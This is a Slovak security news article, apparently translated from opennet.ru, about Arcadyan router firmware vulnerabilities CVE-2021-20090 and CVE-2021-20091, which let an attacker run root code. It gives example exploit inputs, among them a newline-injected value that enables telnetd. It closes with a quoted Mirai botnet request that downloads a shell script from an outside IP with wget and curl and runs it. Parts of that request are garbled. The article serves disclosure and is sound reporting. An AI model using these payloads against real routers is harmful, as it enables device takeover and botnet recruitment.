V sieti bol zaznamenaný masívny útok proti domácim routerom, ktorých firmvér využíva implementáciu HTTP servera od spoločnosti Arcadyan. Na získanie kontroly nad zariadeniami sa používa kombinácia dvoch zraniteľností, ktorá umožňuje vzdialené spustenie ľubovoľného kódu s právami root. Problém sa týka pomerne širokého spektra ADSL routerov Arcadyan, ASUS a Buffalo, ako aj zariadení dodávaných pod značkami Beeline (problém je potvrdený v Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone a iných telekomunikačných operátorov. Je potrebné poznamenať, že problém je prítomný vo firmvéri Arcadyan už viac ako 10 rokov a počas tejto doby sa podarilo migrovať na najmenej 20 modelov zariadení od 17 rôznych výrobcov.
Prvá zraniteľnosť, CVE-2021-20090, umožňuje prístup k akémukoľvek skriptu webového rozhrania bez autentifikácie. Podstatou zraniteľnosti je, že vo webovom rozhraní sú niektoré adresáre, cez ktoré sa odosielajú obrázky, CSS súbory a JavaScript skripty, prístupné bez autentifikácie. V tomto prípade sú adresáre, ku ktorým je povolený prístup bez autentifikácie, kontrolované pomocou počiatočnej masky. Zadávanie znakov „../“ v cestách na prechod do nadradeného adresára je blokované firmvérom, ale použitie kombinácie „..%2f“ sa preskočí. Takto je možné otvárať chránené stránky pri odosielaní požiadaviek ako „http://192.168.1.1/images/..%2findex.htm“.
Druhá chyba zabezpečenia, CVE-2021-20091, umožňuje overenému používateľovi vykonať zmeny v systémových nastaveniach zariadenia odoslaním špeciálne naformátovaných parametrov do skriptu apply_abstract.cgi, ktorý nekontroluje prítomnosť znaku nového riadku v parametroch. . Napríklad pri vykonávaní operácie ping môže útočník zadať hodnotu „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ v poli s kontrolovanou IP adresou a skriptom pri vytváraní súboru nastavení /tmp/etc/config/ .glbcfg, zapíše do neho riadok “AARC_SYS_TelnetdEnable=1”, čím sa aktivuje server telnetd, ktorý poskytuje neobmedzený prístup k príkazovému shellu s právami root. Podobne, nastavením parametra AARC_SYS môžete spustiť ľubovoľný kód v systéme. Prvá zraniteľnosť umožňuje spustiť problematický skript bez autentifikácie prístupom k nemu ako „/images/..%2fapply_abstract.cgi“.
Na zneužitie zraniteľností musí byť útočník schopný odoslať požiadavku na sieťový port, na ktorom beží webové rozhranie. Súdiac podľa dynamiky šírenia útoku, mnohí operátori nechávajú prístup na svoje zariadenia z externej siete, aby zjednodušili diagnostiku problémov podpornej službe. Ak je prístup k rozhraniu obmedzený len na internú sieť, útok môže byť vykonaný z externej siete pomocou techniky „DNS rebinding“. Chyby zabezpečenia sa už aktívne využívajú na pripojenie smerovačov k botnetu Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: zavrieť User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Zdroj: opennet.ru